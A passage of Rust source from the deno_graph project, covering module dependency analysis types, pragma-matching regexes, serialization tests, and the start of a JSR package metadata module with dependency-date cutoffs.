      ImportAttribute::Unknown => None,
    }
  }

  /// True when the `type` attribute marks this import as an asset
  /// (`"text"` or `"bytes"`).
  pub fn has_asset(&self) -> bool {
    matches!(self.get("type"), Some("text" | "bytes"))
  }
}
#[derive(
Default, Clone, Copy, Debug, Eq, PartialEq, Serialize, Deserialize,
)]
#[serde(rename_all = "camelCase")]
pub enum DynamicDependencyKind {
#[default]
Import,
ImportSource,
Require,
}
#[derive(Clone, Copy, Debug, Eq, PartialEq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub enum StaticDependencyKind {
Import,
ImportSource,
ImportType,
ImportEquals,
Export,
ExportType,
ExportEquals,
MaybeTsModuleAugmentation,
}
/// Describes a statically analyzable import/export statement.
#[derive(Clone, Debug, Eq, PartialEq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct StaticDependencyDescriptor {
  /// The kind of dependency.
  pub kind: StaticDependencyKind,
  /// An optional specifier overriding the types associated with the
  /// import/export statement, if any.
  #[serde(skip_serializing_if = "Option::is_none", default)]
  pub types_specifier: Option<SpecifierWithRange>,
  /// The text specifier associated with the import/export statement.
  pub specifier: String,
  /// The range of the specifier.
  pub specifier_range: PositionRange,
  /// Whether this is a side effect import (serialized as `sideEffect`).
  #[serde(skip_serializing_if = "is_false", default, rename = "sideEffect")]
  pub is_side_effect: bool,
  /// Import attributes for this dependency.
  #[serde(skip_serializing_if = "ImportAttributes::is_none", default)]
  pub import_attributes: ImportAttributes,
}
impl From<StaticDependencyDescriptor> for DependencyDescriptor {
fn from(descriptor: StaticDependencyDescriptor) -> Self {
DependencyDescriptor::Static(descriptor)
}
}
/// The analyzed argument of a dynamic import or require call.
#[derive(Default, Clone, Debug, Eq, PartialEq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase", untagged)]
pub enum DynamicArgument {
  /// A statically analyzed string literal argument.
  String(String),
  /// A template literal argument composed of analyzable parts.
  Template(Vec<DynamicTemplatePart>),
  /// An expression that could not be analyzed.
  #[default]
  Expr,
}
impl DynamicArgument {
pub fn is_expr(&self) -> bool {
matches!(self, DynamicArgument::Expr)
}
}
/// A piece of a template literal passed as a dynamic import argument.
#[derive(Clone, Debug, Eq, PartialEq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase", tag = "type")]
pub enum DynamicTemplatePart {
  /// A statically known string segment of the template.
  String {
    value: String,
  },
  /// An expression that could not be analyzed.
  Expr,
}
/// Describes a dynamic import/require dependency.
#[derive(Clone, Debug, Eq, PartialEq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct DynamicDependencyDescriptor {
  /// The kind of dynamic call (skipped when it is the default `import`).
  #[serde(skip_serializing_if = "is_dynamic_esm", default)]
  pub kind: DynamicDependencyKind,
  /// An optional specifier overriding the types associated with the
  /// import/export statement, if any.
  #[serde(skip_serializing_if = "Option::is_none", default)]
  pub types_specifier: Option<SpecifierWithRange>,
  /// The argument associated with the dynamic import.
  #[serde(skip_serializing_if = "DynamicArgument::is_expr", default)]
  pub argument: DynamicArgument,
  /// The range of the argument.
  pub argument_range: PositionRange,
  /// Import attributes for this dependency.
  #[serde(skip_serializing_if = "ImportAttributes::is_none", default)]
  pub import_attributes: ImportAttributes,
}
/// Serialization helper: `import` is the default dynamic dependency kind,
/// so it is omitted from the serialized form.
fn is_dynamic_esm(kind: &DynamicDependencyKind) -> bool {
  matches!(kind, DynamicDependencyKind::Import)
}
impl From<DynamicDependencyDescriptor> for DependencyDescriptor {
fn from(descriptor: DynamicDependencyDescriptor) -> Self {
DependencyDescriptor::Dynamic(descriptor)
}
}
/// A specifier's text along with its source position range.
#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct SpecifierWithRange {
  /// The specifier text.
  pub text: String,
  /// Where the specifier appears in the source.
  pub range: PositionRange,
}
/// The `resolution-mode` of a types reference (`require` or `import`).
#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub enum TypeScriptTypesResolutionMode {
  Require,
  Import,
}
impl TypeScriptTypesResolutionMode {
  /// Parses the resolution mode text, returning `None` for any
  /// unrecognized value.
  #[allow(clippy::should_implement_trait)]
  pub fn from_str(text: &str) -> Option<Self> {
    match text {
      "require" => Some(Self::Require),
      "import" => Some(Self::Import),
      _ => None,
    }
  }

  /// Converts this mode into deno_graph's [`ResolutionMode`] equivalent.
  pub fn as_deno_graph(&self) -> ResolutionMode {
    match self {
      Self::Import => ResolutionMode::Import,
      Self::Require => ResolutionMode::Require,
    }
  }
}
/// A triple slash (`/// <reference ... />`) directive found in a module.
#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
#[serde(tag = "type")]
pub enum TypeScriptReference {
  /// A `path="..."` reference.
  Path(SpecifierWithRange),
  /// A `types="..."` reference, optionally with a `resolution-mode`.
  #[serde(rename_all = "camelCase")]
  Types {
    #[serde(flatten)]
    specifier: SpecifierWithRange,
    #[serde(skip_serializing_if = "Option::is_none", default)]
    resolution_mode: Option<TypeScriptTypesResolutionMode>,
  },
}
/// An import discovered in a JSDoc comment block.
#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct JsDocImportInfo {
  /// The imported specifier and its position.
  #[serde(flatten)]
  pub specifier: SpecifierWithRange,
  /// An optional resolution mode associated with the import.
  #[serde(skip_serializing_if = "Option::is_none", default)]
  pub resolution_mode: Option<TypeScriptTypesResolutionMode>,
}
/// Information about JS/TS module.
#[derive(Debug, Default, Clone, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct ModuleInfo {
  /// If the module has nothing that makes it for sure an ES module
  /// (no top level await, imports, exports, or `import.meta`).
  #[serde(skip_serializing_if = "is_false", default, rename = "script")]
  pub is_script: bool,
  /// Dependencies of the module.
  #[serde(skip_serializing_if = "Vec::is_empty", default)]
  pub dependencies: Vec<DependencyDescriptor>,
  /// Triple slash references.
  #[serde(skip_serializing_if = "Vec::is_empty", default)]
  pub ts_references: Vec<TypeScriptReference>,
  /// Comment with `@ts-self-types` pragma.
  #[serde(skip_serializing_if = "Option::is_none", default)]
  pub self_types_specifier: Option<SpecifierWithRange>,
  /// Comment with a `@jsxImportSource` pragma on JSX/TSX media types
  #[serde(skip_serializing_if = "Option::is_none", default)]
  pub jsx_import_source: Option<SpecifierWithRange>,
  /// Comment with a `@jsxImportSourceTypes` pragma on JSX/TSX media types
  #[serde(skip_serializing_if = "Option::is_none", default)]
  pub jsx_import_source_types: Option<SpecifierWithRange>,
  /// Type imports in JSDoc comment blocks (e.g. `{import("./types.d.ts").Type}`)
  /// or `@import { SomeType } from "npm:some-module"`.
  #[serde(skip_serializing_if = "Vec::is_empty", default)]
  pub jsdoc_imports: Vec<JsDocImportInfo>,
  /// Source map URL extracted from sourceMappingURL comment
  #[serde(skip_serializing_if = "Option::is_none", default)]
  pub source_map_url: Option<SpecifierWithRange>,
}
/// Serialization helper: lets serde skip boolean fields that are `false`.
fn is_false(v: &bool) -> bool {
  !*v
}
/// Converts a serialized v1 module graph JSON value into the v2 shape,
/// in place.
///
/// v1 stored raw `leadingComments` on each dependency; v2 stores a
/// pre-analyzed `typesSpecifier` instead. This extracts any `@deno-types`
/// pragma from the final leading comment, writes it as `typesSpecifier`,
/// then removes the `leadingComments` property.
pub fn module_graph_1_to_2(module_info: &mut serde_json::Value) {
  #[derive(Clone, Debug, Eq, PartialEq, Serialize, Deserialize)]
  #[serde(rename_all = "camelCase")]
  struct Comment {
    text: String,
    range: PositionRange,
  }
  /// Searches comments for any `@deno-types` compiler hints.
  fn analyze_deno_types(
    leading_comments: &[Comment],
  ) -> Option<SpecifierWithRange> {
    // Translates a byte range within the comment's text into a
    // line/character position range in the source file.
    fn comment_position_to_position_range(
      mut comment_start: Position,
      range: std::ops::Range<usize>,
    ) -> PositionRange {
      // the comment text starts after the double slash or slash star, so add 2
      comment_start.character += 2;
      PositionRange {
        // This will always be on the same line.
        // Does -1 and +1 to include the quotes
        start: Position {
          line: comment_start.line,
          character: comment_start.character + range.start - 1,
        },
        end: Position {
          line: comment_start.line,
          character: comment_start.character + range.end + 1,
        },
      }
    }
    // only the comment immediately preceding the dependency is considered
    let comment = leading_comments.last()?;
    let deno_types = find_deno_types(&comment.text)?;
    Some(SpecifierWithRange {
      text: deno_types.text.to_string(),
      range: comment_position_to_position_range(
        comment.range.start,
        deno_types.range,
      ),
    })
  }
  // To support older module graphs, we need to convert the module graph 1
  // to the new format. To do this, we need to extract the types specifier
  // from the leading comments and add it to the dependency object.
  if let serde_json::Value::Object(module_info) = module_info
    && let Some(dependencies) = module_info
      .get_mut("dependencies")
      .and_then(|v| v.as_array_mut())
  {
    for dependency in dependencies {
      if let Some(dependency) = dependency.as_object_mut()
        && let Some(leading_comments) = dependency
          .get("leadingComments")
          .and_then(|v| v.as_array())
          .and_then(|v| {
            v.iter()
              .map(|v| serde_json::from_value(v.clone()).ok())
              .collect::<Option<Vec<Comment>>>()
          })
      {
        if let Some(deno_types) = analyze_deno_types(&leading_comments) {
          dependency.insert(
            "typesSpecifier".to_string(),
            serde_json::to_value(deno_types).unwrap(),
          );
        }
        dependency.remove("leadingComments");
      }
    }
  };
}
/// Analyzes the provided module.
///
/// It can be assumed that the source has not changed since
/// it was loaded by deno_graph.
#[async_trait::async_trait(?Send)]
pub trait ModuleAnalyzer {
  /// Analyzes the module, producing its [`ModuleInfo`].
  async fn analyze(
    &self,
    specifier: &ModuleSpecifier,
    source: Arc<str>,
    media_type: MediaType,
  ) -> Result<ModuleInfo, JsErrorBox>;
}
/// The default analyzer is the swc-based one when the `swc` cargo feature
/// is enabled; without that feature there is no default and this panics.
impl<'a> Default for &'a dyn ModuleAnalyzer {
  fn default() -> &'a dyn ModuleAnalyzer {
    #[cfg(feature = "swc")]
    {
      &crate::ast::DefaultModuleAnalyzer
    }
    #[cfg(not(feature = "swc"))]
    {
      panic!(
        "Provide a module analyzer or turn on the 'swc' cargo feature of deno_graph."
      );
    }
  }
}
/// The result of locating a `@deno-types` pragma within a comment's text.
pub struct DenoTypesPragmaMatch<'a> {
  /// The specifier text of the pragma.
  pub text: &'a str,
  /// The byte range of the matched specifier within the comment text.
  pub range: std::ops::Range<usize>,
  /// Whether the specifier appeared without surrounding quotes.
  pub is_quoteless: bool,
}
/// Matches a `/// <reference ... />` comment reference.
pub fn is_comment_triple_slash_reference(comment_text: &str) -> bool {
  static RE: Lazy<Regex> =
    Lazy::new(|| Regex::new(r"(?i)^/\s*<reference\s.*?/>").unwrap());
  RE.is_match(comment_text)
}
/// Matches a path reference, which adds a dependency to a module
pub fn find_path_reference(text: &str) -> Option<regex::Match<'_>> {
  static PATH_REFERENCE_RE: Lazy<Regex> =
    Lazy::new(|| Regex::new(r#"(?i)\spath\s*=\s*["']([^"']*)["']"#).unwrap());
  // capture group 1 is the quoted path value
  PATH_REFERENCE_RE.captures(text)?.get(1)
}
/// Matches a types reference, which for JavaScript files indicates the
/// location of types to use when type checking a program that includes it as
/// a dependency.
pub fn find_types_reference(text: &str) -> Option<regex::Match<'_>> {
  static TYPES_REFERENCE_RE: Lazy<Regex> =
    Lazy::new(|| Regex::new(r#"(?i)\stypes\s*=\s*["']([^"']*)["']"#).unwrap());
  // capture group 1 is the quoted types value
  TYPES_REFERENCE_RE.captures(text)?.get(1)
}
/// Ex. `resolution-mode="require"` in `/// <reference types="pkg" resolution-mode="require" />`
pub fn find_resolution_mode(text: &str) -> Option<regex::Match<'_>> {
  static RESOLUTION_MODE_RE: Lazy<Regex> = Lazy::new(|| {
    Regex::new(r#"(?i)\sresolution-mode\s*=\s*["']([^"']*)["']"#).unwrap()
  });
  // capture group 1 is the quoted mode value
  RESOLUTION_MODE_RE.captures(text)?.get(1)
}
/// Matches the `@jsxImportSource` pragma.
pub fn find_jsx_import_source(text: &str) -> Option<regex::Match<'_>> {
  static JSX_IMPORT_SOURCE_RE: Lazy<Regex> =
    Lazy::new(|| Regex::new(r"(?i)^[\s*]*@jsxImportSource\s+(\S+)").unwrap());
  // capture group 1 is the import source specifier
  JSX_IMPORT_SOURCE_RE.captures(text)?.get(1)
}
/// Matches the `@jsxImportSourceTypes` pragma.
pub fn find_jsx_import_source_types(text: &str) -> Option<regex::Match<'_>> {
  static JSX_IMPORT_SOURCE_TYPES_RE: Lazy<Regex> = Lazy::new(|| {
    Regex::new(r"(?i)^[\s*]*@jsxImportSourceTypes\s+(\S+)").unwrap()
  });
  // capture group 1 is the types import source specifier
  JSX_IMPORT_SOURCE_TYPES_RE.captures(text)?.get(1)
}
/// Matches the `sourceMappingURL` comment.
pub fn find_source_mapping_url(text: &str) -> Option<regex::Match<'_>> {
  static SOURCE_MAPPING_URL_RE: Lazy<Regex> = Lazy::new(|| {
    Regex::new(r"(?i)^[#@]\s*sourceMappingURL\s*=\s*(\S+)").unwrap()
  });
  // capture group 1 is the URL value
  SOURCE_MAPPING_URL_RE.captures(text)?.get(1)
}
/// Matches the `@ts-self-types` pragma.
pub fn find_ts_self_types(text: &str) -> Option<regex::Match<'_>> {
  static TS_SELF_TYPES_RE: Lazy<Regex> = Lazy::new(|| {
    Regex::new(r#"(?i)^\s*@ts-self-types\s*=\s*["']([^"']+)["']"#).unwrap()
  });
  // capture group 1 is the quoted specifier
  TS_SELF_TYPES_RE.captures(text)?.get(1)
}
/// Matches the `@ts-types` pragma.
pub fn find_ts_types(text: &str) -> Option<regex::Match<'_>> {
  static TS_TYPES_RE: Lazy<Regex> = Lazy::new(|| {
    Regex::new(r#"(?i)^\s*@ts-types\s*=\s*["']([^"']+)["']"#).unwrap()
  });
  // capture group 1 is the quoted specifier
  TS_TYPES_RE.captures(text)?.get(1)
}
/// Finds a `@deno-types` pragma in the comment text, supporting both
/// quoted (`@deno-types="..."`) and quoteless specifiers.
pub fn find_deno_types(text: &str) -> Option<DenoTypesPragmaMatch<'_>> {
  // Matches the `@deno-types` pragma; group 1 is a quoted specifier,
  // group 2 a quoteless one.
  static DENO_TYPES_RE: Lazy<Regex> = Lazy::new(|| {
    Regex::new(r#"(?i)^\s*@deno-types\s*=\s*(?:["']([^"']+)["']|(\S+))"#)
      .unwrap()
  });
  let captures = DENO_TYPES_RE.captures(text)?;
  let (m, is_quoteless) = match (captures.get(1), captures.get(2)) {
    (Some(m), _) => (m, false),
    (None, Some(m)) => (m, true),
    // the regex guarantees one of the two groups participated
    (None, None) => unreachable!("Unexpected captures from deno types regex"),
  };
  Some(DenoTypesPragmaMatch {
    text: m.as_str(),
    range: m.range(),
    is_quoteless,
  })
}
#[cfg(test)]
mod test {
use std::collections::HashMap;
use pretty_assertions::assert_eq;
use serde::de::DeserializeOwned;
use serde_json::json;
use super::*;
#[test]
fn module_info_serialization_empty() {
// empty
let module_info = ModuleInfo {
is_script: false,
dependencies: Vec::new(),
ts_references: Vec::new(),
self_types_specifier: None,
jsx_import_source: None,
jsx_import_source_types: None,
jsdoc_imports: Vec::new(),
source_map_url: None,
};
run_serialization_test(&module_info, json!({}));
}
#[test]
fn module_info_serialization_deps() {
// with dependencies
let module_info = ModuleInfo {
is_script: true,
dependencies: Vec::from([
StaticDependencyDescriptor {
kind: StaticDependencyKind::ImportEquals,
types_specifier: Some(SpecifierWithRange {
text: "a".to_string(),
range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
}),
specifier: "./test".to_string(),
specifier_range: PositionRange {
start: Position {
line: 1,
character: 2,
},
end: Position {
line: 3,
character: 4,
},
},
import_attributes: ImportAttributes::None,
is_side_effect: false,
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
types_specifier: None,
argument: DynamicArgument::String("./test2".to_string()),
argument_range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
import_attributes: ImportAttributes::Known(HashMap::from([
("key".to_string(), ImportAttribute::Unknown),
(
"key2".to_string(),
ImportAttribute::Known("value".to_string()),
),
("kind".to_string(), ImportAttribute::Unknown),
])),
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Require,
types_specifier: None,
argument: DynamicArgument::String("./test3".to_string()),
argument_range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
import_attributes: ImportAttributes::None,
}
.into(),
]),
ts_references: Vec::new(),
self_types_specifier: None,
jsx_import_source: None,
jsx_import_source_types: None,
jsdoc_imports: Vec::new(),
source_map_url: None,
};
run_serialization_test(
&module_info,
// WARNING: Deserialization MUST be backwards compatible in order
// to load data from JSR.
json!({
"script": true,
"dependencies": [{
"type": "static",
"kind": "importEquals",
"typesSpecifier": {
"text": "a",
"range": [[0, 0], [0, 0]],
},
"specifier": "./test",
"specifierRange": [[1, 2], [3, 4]],
}, {
"type": "dynamic",
"argument": "./test2",
"argumentRange": [[0, 0], [0, 0]],
"importAttributes": {
"known": {
"key": null,
"kind": null,
"key2": "value",
}
}
}, {
"type": "dynamic",
"kind": "require",
"argument": "./test3",
"argumentRange": [[0, 0], [0, 0]]
}]
}),
);
}
#[test]
fn module_info_serialization_ts_references() {
let module_info = ModuleInfo {
is_script: false,
dependencies: Vec::new(),
ts_references: Vec::from([
TypeScriptReference::Path(SpecifierWithRange {
text: "a".to_string(),
range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
}),
TypeScriptReference::Types {
specifier: SpecifierWithRange {
text: "b".to_string(),
range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
},
resolution_mode: None,
},
TypeScriptReference::Types {
specifier: SpecifierWithRange {
text: "node".to_string(),
range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
},
resolution_mode: Some(TypeScriptTypesResolutionMode::Require),
},
TypeScriptReference::Types {
specifier: SpecifierWithRange {
text: "node-esm".to_string(),
range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
},
resolution_mode: Some(TypeScriptTypesResolutionMode::Import),
},
]),
self_types_specifier: None,
jsx_import_source: None,
jsx_import_source_types: None,
jsdoc_imports: Vec::new(),
source_map_url: None,
};
run_serialization_test(
&module_info,
// WARNING: Deserialization MUST be backwards compatible in order
// to load data from JSR.
json!({
"tsReferences": [{
"type": "path",
"text": "a",
"range": [[0, 0], [0, 0]],
}, {
"type": "types",
"text": "b",
"range": [[0, 0], [0, 0]],
}, {
"type": "types",
"text": "node",
"range": [[0, 0], [0, 0]],
"resolutionMode": "require",
}, {
"type": "types",
"text": "node-esm",
"range": [[0, 0], [0, 0]],
"resolutionMode": "import",
}]
}),
);
}
#[test]
fn module_info_serialization_self_types_specifier() {
let module_info = ModuleInfo {
is_script: false,
dependencies: Vec::new(),
ts_references: Vec::new(),
self_types_specifier: Some(SpecifierWithRange {
text: "a".to_string(),
range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
}),
jsx_import_source: None,
jsx_import_source_types: None,
jsdoc_imports: Vec::new(),
source_map_url: None,
};
run_serialization_test(
&module_info,
// WARNING: Deserialization MUST be backwards compatible in order
// to load data from JSR.
json!({
"selfTypesSpecifier": {
"text": "a",
"range": [[0, 0], [0, 0]],
}
}),
);
}
#[test]
fn module_info_serialization_jsx_import_source() {
let module_info = ModuleInfo {
is_script: false,
dependencies: Vec::new(),
ts_references: Vec::new(),
self_types_specifier: None,
jsx_import_source: Some(SpecifierWithRange {
text: "a".to_string(),
range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
}),
jsx_import_source_types: None,
jsdoc_imports: Vec::new(),
source_map_url: None,
};
run_serialization_test(
&module_info,
// WARNING: Deserialization MUST be backwards compatible in order
// to load data from JSR.
json!({
"jsxImportSource": {
"text": "a",
"range": [[0, 0], [0, 0]],
}
}),
);
}
#[test]
fn module_info_serialization_jsx_import_source_types() {
let module_info = ModuleInfo {
is_script: false,
dependencies: Vec::new(),
ts_references: Vec::new(),
self_types_specifier: None,
jsx_import_source: None,
jsx_import_source_types: Some(SpecifierWithRange {
text: "a".to_string(),
range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
}),
jsdoc_imports: Vec::new(),
source_map_url: None,
};
run_serialization_test(
&module_info,
// WARNING: Deserialization MUST be backwards compatible in order
// to load data from JSR.
json!({
"jsxImportSourceTypes": {
"text": "a",
"range": [[0, 0], [0, 0]],
}
}),
);
}
#[test]
fn module_info_jsdoc_imports() {
let module_info = ModuleInfo {
is_script: false,
dependencies: Vec::new(),
ts_references: Vec::new(),
self_types_specifier: None,
jsx_import_source: None,
jsx_import_source_types: None,
jsdoc_imports: Vec::from([
JsDocImportInfo {
specifier: SpecifierWithRange {
text: "a".to_string(),
range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
},
resolution_mode: None,
},
JsDocImportInfo {
specifier: SpecifierWithRange {
text: "b".to_string(),
range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
},
resolution_mode: Some(TypeScriptTypesResolutionMode::Import),
},
JsDocImportInfo {
specifier: SpecifierWithRange {
text: "c".to_string(),
range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
},
resolution_mode: Some(TypeScriptTypesResolutionMode::Require),
},
]),
source_map_url: None,
};
run_serialization_test(
&module_info,
// WARNING: Deserialization MUST be backwards compatible in order
// to load data from JSR.
json!({
"jsdocImports": [{
"text": "a",
"range": [[0, 0], [0, 0]],
}, {
"text": "b",
"range": [[0, 0], [0, 0]],
"resolutionMode": "import",
}, {
"text": "c",
"range": [[0, 0], [0, 0]],
"resolutionMode": "require",
}]
}),
);
}
#[test]
fn static_dependency_descriptor_serialization() {
// with dependencies
let descriptor = DependencyDescriptor::Static(StaticDependencyDescriptor {
kind: StaticDependencyKind::ExportEquals,
types_specifier: Some(SpecifierWithRange {
text: "a".to_string(),
range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
}),
specifier: "./test".to_string(),
specifier_range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
import_attributes: ImportAttributes::Unknown,
is_side_effect: false,
});
run_serialization_test(
&descriptor,
// WARNING: Deserialization MUST be backwards compatible in order
// to load data from JSR.
json!({
"type": "static",
"kind": "exportEquals",
"typesSpecifier": {
"text": "a",
"range": [[0, 0], [0, 0]],
},
"specifier": "./test",
"specifierRange": [[0, 0], [0, 0]],
"importAttributes": "unknown",
}),
);
}
#[test]
fn static_dependency_descriptor_side_effect_serialization() {
// with dependencies
let descriptor = DependencyDescriptor::Static(StaticDependencyDescriptor {
kind: StaticDependencyKind::ExportEquals,
types_specifier: None,
specifier: "./test".to_string(),
specifier_range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
import_attributes: ImportAttributes::Unknown,
is_side_effect: true,
});
run_serialization_test(
&descriptor,
// WARNING: Deserialization MUST be backwards compatible in order
// to load data from JSR.
json!({
"type": "static",
"kind": "exportEquals",
"specifier": "./test",
"specifierRange": [[0, 0], [0, 0]],
"importAttributes": "unknown",
"sideEffect": true,
}),
);
}
#[test]
fn static_dependency_descriptor_import_source_serialization() {
let descriptor = DependencyDescriptor::Static(StaticDependencyDescriptor {
kind: StaticDependencyKind::ImportSource,
types_specifier: None,
specifier: "./test".to_string(),
specifier_range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
import_attributes: ImportAttributes::None,
is_side_effect: false,
});
run_serialization_test(
&descriptor,
// WARNING: Deserialization MUST be backwards compatible in order
// to load data from JSR.
json!({
"type": "static",
"kind": "importSource",
"specifier": "./test",
"specifierRange": [[0, 0], [0, 0]],
}),
);
}
#[test]
fn dynamic_dependency_descriptor_serialization() {
run_serialization_test(
&DependencyDescriptor::Dynamic(DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
types_specifier: Some(SpecifierWithRange {
text: "a".to_string(),
range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
}),
argument: DynamicArgument::Expr,
argument_range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
import_attributes: ImportAttributes::Unknown,
}),
// WARNING: Deserialization MUST be backwards compatible in order
// to load data from JSR.
json!({
"type": "dynamic",
"typesSpecifier": {
"text": "a",
"range": [[0, 0], [0, 0]],
},
"argumentRange": [[0, 0], [0, 0]],
"importAttributes": "unknown",
}),
);
run_serialization_test(
&DependencyDescriptor::Dynamic(DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
types_specifier: None,
argument: DynamicArgument::String("test".to_string()),
argument_range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
import_attributes: ImportAttributes::Unknown,
}),
// WARNING: Deserialization MUST be backwards compatible in order
// to load data from JSR.
json!({
"type": "dynamic",
"argument": "test",
"argumentRange": [[0, 0], [0, 0]],
"importAttributes": "unknown",
}),
);
}
#[test]
fn dynamic_dependency_descriptor_import_source_serialization() {
let descriptor =
DependencyDescriptor::Dynamic(DynamicDependencyDescriptor {
kind: DynamicDependencyKind::ImportSource,
types_specifier: None,
argument: DynamicArgument::String("test".to_string()),
argument_range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
import_attributes: ImportAttributes::None,
});
run_serialization_test(
&descriptor,
// WARNING: Deserialization MUST be backwards compatible in order
// to load data from JSR.
json!({
"type": "dynamic",
"kind": "importSource",
"argument": "test",
"argumentRange": [[0, 0], [0, 0]],
}),
);
}
#[test]
fn test_dynamic_argument_serialization() {
run_serialization_test(
&DynamicArgument::String("test".to_string()),
json!("test"),
);
run_serialization_test(
&DynamicArgument::Template(vec![
DynamicTemplatePart::String {
value: "test".to_string(),
},
DynamicTemplatePart::Expr,
]),
// WARNING: Deserialization MUST be backwards compatible in order
// to load data from JSR.
json!([{
"type": "string",
"value": "test",
}, {
"type": "expr",
}]),
);
}
#[test]
fn test_import_attributes_serialization() {
run_serialization_test(&ImportAttributes::Unknown, json!("unknown"));
run_serialization_test(
&ImportAttributes::Known(HashMap::from([(
"type".to_string(),
ImportAttribute::Unknown,
)])),
json!({
"known": {
"type": null,
}
}),
);
run_serialization_test(
&ImportAttributes::Known(HashMap::from([(
"type".to_string(),
ImportAttribute::Known("test".to_string()),
)])),
json!({
"known": {
"type": "test",
}
}),
);
}
#[test]
fn test_v1_to_v2_deserialization_with_leading_comment() {
let expected = ModuleInfo {
is_script: false,
dependencies: vec![DependencyDescriptor::Static(
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | true |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/packages.rs | src/packages.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use std::collections::BTreeMap;
use std::collections::BTreeSet;
use std::collections::HashMap;
use std::collections::HashSet;
use deno_semver::StackString;
use deno_semver::Version;
use deno_semver::VersionReq;
use deno_semver::jsr::JsrDepPackageReq;
use deno_semver::package::PackageName;
use deno_semver::package::PackageNv;
use deno_semver::package::PackageReq;
use serde::Deserialize;
use serde::Serialize;
use crate::analysis::ModuleInfo;
use crate::analysis::module_graph_1_to_2;
use crate::graph::JsrPackageReqNotFoundError;
/// A cutoff date used to prevent resolving dependency versions that were
/// published at or after this point in time.
#[derive(Debug, Default, Clone, Copy, Serialize, Deserialize)]
pub struct NewestDependencyDate(pub chrono::DateTime<chrono::Utc>);
/// Delegates to the inner date's `Display` implementation.
impl std::fmt::Display for NewestDependencyDate {
  fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
    std::fmt::Display::fmt(&self.0, f)
  }
}
impl NewestDependencyDate {
  /// Returns `true` when `date` is strictly older than the cutoff
  /// (i.e. the dated item is allowed under this cutoff).
  pub fn matches(&self, date: chrono::DateTime<chrono::Utc>) -> bool {
    self.0 > date
  }
}
/// Options controlling the newest allowed dependency date.
#[derive(Debug, Default, Clone, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct NewestDependencyDateOptions {
  /// Prevents installing packages newer than the specified date.
  pub date: Option<NewestDependencyDate>,
  /// JSR packages to exclude from the newest dependency date checks.
  #[serde(default, skip_serializing_if = "BTreeSet::is_empty")]
  pub exclude_jsr_pkgs: BTreeSet<PackageName>,
}
impl NewestDependencyDateOptions {
pub fn from_date(date: chrono::DateTime<chrono::Utc>) -> Self {
Self {
date: Some(NewestDependencyDate(date)),
exclude_jsr_pkgs: Default::default(),
}
}
pub fn get_for_package(
&self,
package_name: &PackageName,
) -> Option<NewestDependencyDate> {
let date = self.date?;
if self.exclude_jsr_pkgs.contains(package_name) {
None
} else {
Some(date)
}
}
}
/// Registry metadata about a JSR package: the set of published versions.
#[derive(Debug, Serialize, Deserialize, Clone)]
pub struct JsrPackageInfo {
  pub versions: HashMap<Version, JsrPackageInfoVersion>,
}
/// Serialization helper: lets serde skip boolean fields that are `false`.
fn is_false(v: &bool) -> bool {
  !*v
}
/// Registry metadata about a single published version of a JSR package.
#[derive(Debug, Serialize, Deserialize, Clone, Default)]
#[serde(rename_all = "camelCase")]
pub struct JsrPackageInfoVersion {
  /// When the version was published, if known.
  #[serde(default, skip_serializing_if = "Option::is_none")]
  pub created_at: Option<chrono::DateTime<chrono::Utc>>,
  /// Whether the version has been yanked.
  #[serde(default, skip_serializing_if = "is_false")]
  pub yanked: bool,
}
impl JsrPackageInfoVersion {
  /// Returns `true` when this version is allowed under the provided
  /// newest-dependency-date cutoff.
  pub fn matches_newest_dependency_date(
    &self,
    cutoff: NewestDependencyDate,
  ) -> bool {
    match self.created_at {
      Some(created_at) => cutoff.matches(created_at),
      // assume versions without a creation date are really old
      None => true,
    }
  }
}
/// A single file entry in a JSR package version manifest.
#[derive(Debug, Serialize, Deserialize, Clone, Default)]
#[serde(rename_all = "camelCase")]
pub struct JsrPackageVersionManifestEntry {
